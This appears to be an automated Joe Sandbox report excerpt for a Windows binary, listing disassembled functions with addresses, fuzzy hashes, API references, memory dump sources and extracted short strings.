Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction ID: 054ca338a59bfe8196d69d003d3513115d5f874abc9eab2c3c1e7fde84d08f47
Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction Fuzzy Hash: 7911822191CB6582EB61BF05B88413E6392FB887A4F900673E9DDC7374CF2CE9906B00

Function 00007FF6416713D0 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDlgButtonChecked.USER32 ref: 00007FF6416713FF

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: ButtonChecked
String ID:
API String ID: 1719414920-0
Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction ID: 56211e5e693b8b314a7a9a3c465ca73e9a801cb44aa1ff3145a680edc2229f2a
Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction Fuzzy Hash: D7F02D62A0C28044EB312621F54027A9B20AB98BF8F180576ED9D87BA8CE1DC7819B00

Function 00007FF641675750 Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,00007FF64162432B), ref: 00007FF6416757A5

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction ID: cd0164eb7c9e8baa9c2653d0338fb0e5611b5712129290f29ceab6d8f719658d
Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction Fuzzy Hash: 98F01D2562DB44C5DAA9AB19F89023DB7A9F7C8790F101066FA9E83B6CDF3DC4509B00

Function 00007FF641675620 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDeleteBoundaryDescriptor.NTDLL(1063196CE2D18368,00007FF64160B179), ref: 00007FF64167565F

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
Instruction ID: ca61d2a75a2b52436e18af5873ba3039914cb5083f146d73f2b38829d7e5e6c4
Opcode Fuzzy Hash: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
Instruction Fuzzy Hash: 35E06525A0CB95C5DB60B716F84012963A2F78CB90F284272DD9DC7735EE2CD6925A00

Function 00007FF641675C40 Relevance: 1.5, APIs: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00007FF641675C84

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction ID: 5d365809427efeed416951e111a28b77ec623195dec4cd180d9b217de1d5915b
Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction Fuzzy Hash: ACF0652561CB4485DB78B705A8D033967A6FB98744F4002BAEE4F93768CE3CD4519701

Function 00007FF641652F40 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF641652F63

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction ID: 882609c1fc79c1414d7a8d488fea2e46f299b084081487f8441e750b7124e601
Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction Fuzzy Hash: 93E0200694D391C2E6393229345007D6B615FD6354F280339E69F916D9CD0DDF576B04

Non-executed Functions

Function 00007FF64163B6B0 Relevance: 48.0, Strings: 35, Instructions: 4292COMMON

Download Yara Rule

Strings

+CB, xrefs: 00007FF64163DFAC
n,9T, xrefs: 00007FF64163C706
~{, xrefs: 00007FF64163DC97
n^ m, xrefs: 00007FF641640175
()m, xrefs: 00007FF641640E85
e@~, xrefs: 00007FF64163C8DA
zB/, xrefs: 00007FF64163E8EB
2>", xrefs: 00007FF64163C970
~{, xrefs: 00007FF64163C924
zB/, xrefs: 00007FF64163C3DD
*OqW, xrefs: 00007FF64163CF07
xYjl, xrefs: 00007FF64163CA47
*OqW, xrefs: 00007FF64163D160
n^ m, xrefs: 00007FF641640F4C
6j]U, xrefs: 00007FF64163E52A
()m, xrefs: 00007FF64163DE1D
o,9T, xrefs: 00007FF64163E430
o,9T, xrefs: 00007FF64163D635
Pw3, xrefs: 00007FF64163C510
XdU, xrefs: 00007FF64163ECD5
XdU, xrefs: 00007FF64163D64B
+CB, xrefs: 00007FF64163C3E3
~{, xrefs: 00007FF6416400F2
f@~, xrefs: 00007FF64163DC3F
)OqW, xrefs: 00007FF64163CEFC
Pw3, xrefs: 00007FF64163EB18
J"l[, xrefs: 00007FF64163D45C
I"l[, xrefs: 00007FF64163C428
2>", xrefs: 00007FF64163E196
J"l[, xrefs: 00007FF64163D330
xYjl, xrefs: 00007FF64163EC00
zB/, xrefs: 00007FF64163CAF0
6j]U, xrefs: 00007FF64163D640
Pw3, xrefs: 00007FF64163F495
f@~, xrefs: 00007FF64163E83D

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ~{$2>"$2>"$Pw3$Pw3$Pw3$~{$~{$)OqW$*OqW$*OqW$+CB$+CB$6j]U$6j]U$I"l[$J"l[$J"l[$e@~$f@~$f@~$n,9T$n^ m$n^ m$o,9T$o,9T$xYjl$xYjl$zB/$zB/$zB/$()m$()m$XdU$XdU
API String ID: 0-2338440668
Opcode ID: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
Instruction ID: f02d8495e2ccc8188fbbb74ac878a6924c842acfb3e009af775836ee84919d76
Opcode Fuzzy Hash: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
Instruction Fuzzy Hash: B693E736A0C7C986EB76AB18A4803FE73A5EF84790F145136DA8DC7B94CE2CD441EB45

Function 00007FF641629830 Relevance: 39.6, Strings: 29, Instructions: 3345COMMON

Download Yara Rule

Strings

J}m, xrefs: 00007FF64162998C
-gq|, xrefs: 00007FF64162C47A
-gq|, xrefs: 00007FF64162BB29
z>J, xrefs: 00007FF64162C828
iH>l, xrefs: 00007FF641629968
z>J, xrefs: 00007FF641629F63
O\V, xrefs: 00007FF64162BF57
1\Vg, xrefs: 00007FF64162C990
E<i, xrefs: 00007FF64162A0D7
tS., xrefs: 00007FF641629FEF
lRE0, xrefs: 00007FF641629CE7
^\~H, xrefs: 00007FF64162AADA
1\Vg, xrefs: 00007FF64162BE5E
0Ki, xrefs: 00007FF64162AAD0
z>J, xrefs: 00007FF641629F57
0Ki, xrefs: 00007FF64162A0E3
fC, xrefs: 00007FF64162C19C
tS., xrefs: 00007FF64162B36E
-gq|, xrefs: 00007FF64162C532
J}m, xrefs: 00007FF64162DC18
E<i, xrefs: 00007FF64162D500
_\~H, xrefs: 00007FF64162B3FB
fC, xrefs: 00007FF64162B7E2
O\V, xrefs: 00007FF64162A32A
jH>l, xrefs: 00007FF641629974
lRE0, xrefs: 00007FF64162D47A
_\~H, xrefs: 00007FF64162BD41
jH>l, xrefs: 00007FF64162D44D
sS., xrefs: 00007FF641629CB7

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: -gq|$-gq|$-gq|$0Ki$0Ki$1\Vg$1\Vg$E<i$E<i$J}m$J}m$O\V$O\V$^\~H$_\~H$_\~H$iH>l$jH>l$jH>l$lRE0$lRE0$sS.$tS.$tS.$z>J$z>J$z>J$fC$fC
API String ID: 0-1980736421
Opcode ID: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
Instruction ID: 1e658c6690a0f50da9d75a79b6905eaa3ba25699cd3f55b21f4a81cab8e8d4a6
Opcode Fuzzy Hash: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
Instruction Fuzzy Hash: 8273A626F0CBC689DB79BF2598903FD2395EB84758F14013ADA4E8BF98CE39D6509701

Function 00007FF641601920 Relevance: 39.4, Strings: 30, Instructions: 1904COMMON

Download Yara Rule

Strings

Nc^m, xrefs: 00007FF64160235D
Wc,, xrefs: 00007FF641603608
<3RB, xrefs: 00007FF6416022C4
b[`S, xrefs: 00007FF641602414
(]u, xrefs: 00007FF641603184
G#p, xrefs: 00007FF641601FFD
DcW, xrefs: 00007FF641603243
8\q , xrefs: 00007FF641601BE8
a[`S, xrefs: 00007FF641601D21
kwEb, xrefs: 00007FF641603DE4
b[`S, xrefs: 00007FF641601D2C
DcW, xrefs: 00007FF6416023D9
G#p, xrefs: 00007FF641602D63
X~wo, xrefs: 00007FF641603C2C
8\q , xrefs: 00007FF6416019AB
(]u, xrefs: 00007FF641602B09
Wc,, xrefs: 00007FF641601FF2
X~wo, xrefs: 00007FF6416024A1
<3RB, xrefs: 00007FF641602DAF
Nc^m, xrefs: 00007FF64160248B
ud8, xrefs: 00007FF641601CC4
k=5, xrefs: 00007FF64160257C
ud8, xrefs: 00007FF6416032E5
td8, xrefs: 00007FF641601AD0
Mc^m, xrefs: 00007FF641602480
7\q , xrefs: 00007FF641601BD2
']u, xrefs: 00007FF641601B6B
k=5, xrefs: 00007FF6416037A0
kwEb, xrefs: 00007FF641603C70
;3RB, xrefs: 00007FF6416022B9

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: ']u$(]u$(]u$7\q $8\q $8\q $;3RB$<3RB$<3RB$G#p$G#p$Mc^m$Nc^m$Nc^m$Wc,$Wc,$X~wo$X~wo$a[`S$b[`S$b[`S$k=5$k=5$kwEb$kwEb$td8$ud8$ud8$DcW$DcW
API String ID: 0-67992731
Opcode ID: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
Instruction ID: b3b165606ca0f9e14a5ce3f933d85a5e8b24ac3355924a9c90f03139548d5f24
Opcode Fuzzy Hash: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
Instruction Fuzzy Hash: DB03DD36A0C682CAEB76FA18948067E6BD1DB56350F244936E5DDC7BD4CF2CE540AF01

Function 00007FF641678AB0 Relevance: 35.3, APIs: 3, Strings: 16, Instructions: 2093COMMON

Download Yara Rule

Strings

^t.+, xrefs: 00007FF641679B69
P$, xrefs: 00007FF641678FA6
D_oq, xrefs: 00007FF6416791DB
TKp/, xrefs: 00007FF64167A82F
E_oq, xrefs: 00007FF64167A300
TKp/, xrefs: 00007FF64167979D
_P", xrefs: 00007FF641679D0D
SKp/, xrefs: 00007FF641679791
^t.+, xrefs: 00007FF641679037
E_oq, xrefs: 00007FF6416791E7
P$, xrefs: 00007FF641679CD0
|1U, xrefs: 00007FF64167B437
_P", xrefs: 00007FF64167ABE2
P$, xrefs: 00007FF64167A17D
|1U, xrefs: 00007FF641679A65
P$, xrefs: 00007FF641679FAE

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: D_oq$E_oq$E_oq$SKp/$TKp/$TKp/$^t.+$^t.+$|1U$|1U$P$$P$$P$$P$$_P"$_P"
API String ID: 0-202705158
Opcode ID: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
Instruction ID: 0b33a1ccac9c09f0c6f3c0993bdb3fc777a86eb3f8f3d45f26e2d39cf8944529
Opcode Fuzzy Hash: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
Instruction Fuzzy Hash: 7F23B926A1DBC589EB79BF35D8943FD23A4EB48794F500137DA1E8BF94CE28DA419301

Function 00007FF6415FC400 Relevance: 33.2, Strings: 25, Instructions: 1974COMMON

Download Yara Rule

Strings

tG%, xrefs: 00007FF6415FC9DF
l6", xrefs: 00007FF6415FEA68
y, xrefs: 00007FF6415FD99E
^z.5, xrefs: 00007FF6415FE52B
O(A, xrefs: 00007FF6415FC936
y, xrefs: 00007FF6415FC7A6
q4, xrefs: 00007FF6415FD212
l6", xrefs: 00007FF6415FD6F1
o>;, xrefs: 00007FF6415FCFAC
@Y7@, xrefs: 00007FF6415FD981
l6", xrefs: 00007FF6415FD344
%$Ip, xrefs: 00007FF6415FD17F
P(A, xrefs: 00007FF6415FDA2F
Rw]0, xrefs: 00007FF6415FC864
%$Ip, xrefs: 00007FF6415FD3A9
^z.5, xrefs: 00007FF6415FD8E0
@Y7@, xrefs: 00007FF6415FC962
tG%, xrefs: 00007FF6415FE47C
tG%, xrefs: 00007FF6415FC80A
q4, xrefs: 00007FF6415FD94F
Rw]0, xrefs: 00007FF6415FC9F5
o>;, xrefs: 00007FF6415FE0B1
sG%, xrefs: 00007FF6415FC9D4
Rw]0, xrefs: 00007FF6415FCD6E
P(A, xrefs: 00007FF6415FD829

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: q4$q4$%$Ip$%$Ip$@Y7@$@Y7@$O(A$P(A$P(A$Rw]0$Rw]0$Rw]0$^z.5$^z.5$sG%$tG%$tG%$tG%$l6"$l6"$l6"$o>;$o>;$y$y
API String ID: 0-3491445807
Opcode ID: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
Instruction ID: 1ae7bc952f391a83d158a8cf1a34f2f08faf2ef86f414301892f1f0f9874fac6
Opcode Fuzzy Hash: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
Instruction Fuzzy Hash: 4B131A76A0D6C186DB7AB618A4846FE77E2EBC5710F140136D6FEC7BA8DE2CD4448B01

Function 00007FF64161D390 Relevance: 30.4, Strings: 23, Instructions: 1655COMMON

Download Yara Rule

Strings

;,y3, xrefs: 00007FF64161D50D
RRd`, xrefs: 00007FF64161D5CC
;,y3, xrefs: 00007FF64161D85C
<<b, xrefs: 00007FF64161DE49
RRd`, xrefs: 00007FF64161EED9
<<b, xrefs: 00007FF64161DE44
<<b, xrefs: 00007FF64161D8E0
<<b, xrefs: 00007FF64161F13E
Ar#X, xrefs: 00007FF64161DC76
;<b, xrefs: 00007FF64161D8D5
s|x2, xrefs: 00007FF64161F0E0
AMC, xrefs: 00007FF64161EFDC
QRd`, xrefs: 00007FF64161D5C1
AMC, xrefs: 00007FF64161DA24
Ar#X, xrefs: 00007FF64161D5F7
;#%, xrefs: 00007FF64161DB22
"2ZB, xrefs: 00007FF64161DD23
"2ZB, xrefs: 00007FF64161DF36
;#%, xrefs: 00007FF64161D684
@r#X, xrefs: 00007FF64161DC6B
s|x2, xrefs: 00007FF64161D502
@MC, xrefs: 00007FF64161DA19
;,y3, xrefs: 00007FF64161ED6B

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: "2ZB$"2ZB$;#%$;#%$;,y3$;,y3$;,y3$;<b$<<b$<<b$<<b$<<b$@MC$@r#X$AMC$AMC$Ar#X$Ar#X$QRd`$RRd`$RRd`$s|x2$s|x2
API String ID: 0-4187098220
Opcode ID: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
Instruction ID: 27e3d0a7adc783d0d864ea6bbdcddb0a140d45a3356b2e7317e4532b40937ec4
Opcode Fuzzy Hash: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
Instruction Fuzzy Hash: 2EF20C35A4D7D685EB76BB28B4842BE7BE1EB84748F100536D94DC7798CE2CF580AB01

Function 00007FF6415F1450 Relevance: 27.9, Strings: 21, Instructions: 1671COMMON

Download Yara Rule

Strings

F~_, xrefs: 00007FF6415F1EC0
gkp., xrefs: 00007FF6415F29B8
y,P, xrefs: 00007FF6415F20B1
lUHm, xrefs: 00007FF6415F2AD4
3_0, xrefs: 00007FF6415F26C4
bU, xrefs: 00007FF6415F2B23
F~_, xrefs: 00007FF6415F319A
bU, xrefs: 00007FF6415F181D
F~_, xrefs: 00007FF6415F1835
3_0, xrefs: 00007FF6415F1B77
3_0, xrefs: 00007FF6415F1B72
F~_, xrefs: 00007FF6415F1841
6, xrefs: 00007FF6415F1DD0
lUHm, xrefs: 00007FF6415F222E
gkp., xrefs: 00007FF6415F1775
7, xrefs: 00007FF6415F1813
y,P, xrefs: 00007FF6415F32AD
3_0, xrefs: 00007FF6415F2925
y,P, xrefs: 00007FF6415F1BAD
7, xrefs: 00007FF6415F26B8
bU, xrefs: 00007FF6415F1E3B

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: F~_$F~_$F~_$F~_$3_0$3_0$3_0$3_0$6$7$7$gkp.$gkp.$lUHm$lUHm$bU$bU$bU$y,P$y,P$y,P
API String ID: 0-4281497918
Opcode ID: 79e8a728e5764ced7f44b7ad5268e7822cd8efb54ea51e83ab8389648d4d7b48
Instruction ID: af33034dcbfcceabe16e136f333bd22567a04f26e70f4d03240c155ec44ad2d7
Opcode Fuzzy Hash: 79e8a728e5764ced7f44b7ad5268e7822cd8efb54ea51e83ab8389648d4d7b48
Instruction Fuzzy Hash: 05F2C5B7D0C1D186D77A7A057544AFEA796E7A0798F050121CEB963FA8CF28ED408F81

Function 00007FF641620740 Relevance: 27.1, Strings: 21, Instructions: 864COMMON

Download Yara Rule

Strings

HSM-, xrefs: 00007FF641620DE6
~0%), xrefs: 00007FF641620C60
q\z, xrefs: 00007FF641620BDA
q\z, xrefs: 00007FF6416211C4
"k5, xrefs: 00007FF6416217BB
}k+, xrefs: 00007FF641620D9B
V}M, xrefs: 00007FF641620CDC
}k+, xrefs: 00007FF64162084C
q\z, xrefs: 00007FF6416211CE
!k5, xrefs: 00007FF6416207CD
V}M, xrefs: 00007FF641620C1F
~0%), xrefs: 00007FF641621834
|k+, xrefs: 00007FF641620841
HSM-, xrefs: 00007FF641620CA9
q\z, xrefs: 00007FF641621544
"k5, xrefs: 00007FF641620E24
q\z, xrefs: 00007FF641620BE5
"k5, xrefs: 00007FF641620E29
"k5, xrefs: 00007FF64162100D
GSM-, xrefs: 00007FF6416207C2
V}M, xrefs: 00007FF641620D04

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: !k5$"k5$"k5$"k5$"k5$GSM-$HSM-$HSM-$V}M$V}M$V}M$|k+$}k+$}k+$~0%)$~0%)$q\z$q\z$q\z$q\z$q\z
API String ID: 0-2622637242
Opcode ID: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
Instruction ID: 1bf0577bea9307c345b245ad39ce3ba2f5dff3c55e6ba75be98f1c3501d6fe9d
Opcode Fuzzy Hash: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
Instruction Fuzzy Hash: 7C82EC36A0D78686EB75BB19A4803BE7791FB54750F204136EA8DC7BA4DF2CD440AF81

Function 00007FF6415FA0F0 Relevance: 26.4, Strings: 20, Instructions: 1378COMMON

Download Yara Rule

Strings

n;_k, xrefs: 00007FF6415FB064
n;_k, xrefs: 00007FF6415FB4A5
tM|x, xrefs: 00007FF6415FAFF4
&My, xrefs: 00007FF6415FA7AB
79|E, xrefs: 00007FF6415FA499
((LY, xrefs: 00007FF6415FAEEE
tM|x, xrefs: 00007FF6415FB9DA
&My, xrefs: 00007FF6415FBA98
&My, xrefs: 00007FF6415FA238
&G1, xrefs: 00007FF6415FAD57
tM|x, xrefs: 00007FF6415FAD28
79|E, xrefs: 00007FF6415FAF3A
sM|x, xrefs: 00007FF6415FA243
%G1, xrefs: 00007FF6415FA2A8
XkZ, xrefs: 00007FF6415FAE00
tM|x, xrefs: 00007FF6415FB28F
XkZ, xrefs: 00007FF6415FA62F
WkZ, xrefs: 00007FF6415FA3BB
&G1, xrefs: 00007FF6415FAFBA
((LY, xrefs: 00007FF6415FA3D1

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: %G1$&G1$&G1$((LY$((LY$79|E$79|E$WkZ$XkZ$XkZ$n;_k$n;_k$sM|x$tM|x$tM|x$tM|x$tM|x$&My$&My$&My
API String ID: 0-1474312542
Opcode ID: 7e42e376913bd7cf51507d1b9cd3d36dc8f8f9cfee5041506468feac7d8b8f00
Instruction ID: 4b032bfd34b97c675b5258714f04eab6b6626b6961bde8cb871f41d62a955571
Opcode Fuzzy Hash: 7e42e376913bd7cf51507d1b9cd3d36dc8f8f9cfee5041506468feac7d8b8f00
Instruction Fuzzy Hash: CBD2CA75B4C785C9EB79BF6988802FD2392EB49754F204536DA3DCBBB4CE29D5818302

Function 00007FF6415F64A0 Relevance: 26.3, Strings: 19, Instructions: 2521COMMON

Download Yara Rule

Strings

jyku, xrefs: 00007FF6415F7DB4
A{9s, xrefs: 00007FF6415F7269
x"a, xrefs: 00007FF6415F946D
w"a, xrefs: 00007FF6415F6F14
VFL(, xrefs: 00007FF6415F68C7
A{9s, xrefs: 00007FF6415F87B7
A{9s, xrefs: 00007FF6415F87A2
a[, xrefs: 00007FF6415F7569
VFL(, xrefs: 00007FF6415F77B9
iyku, xrefs: 00007FF6415F6708
A{9s, xrefs: 00007FF6415F7C93
a[, xrefs: 00007FF6415F75AD
Cs6, xrefs: 00007FF6415F7888
Cs6, xrefs: 00007FF6415F820E
@{9s, xrefs: 00007FF6415F6720
6;ti, xrefs: 00007FF6415F76AC
jyku, xrefs: 00007FF6415F7854
a[, xrefs: 00007FF6415F75A8
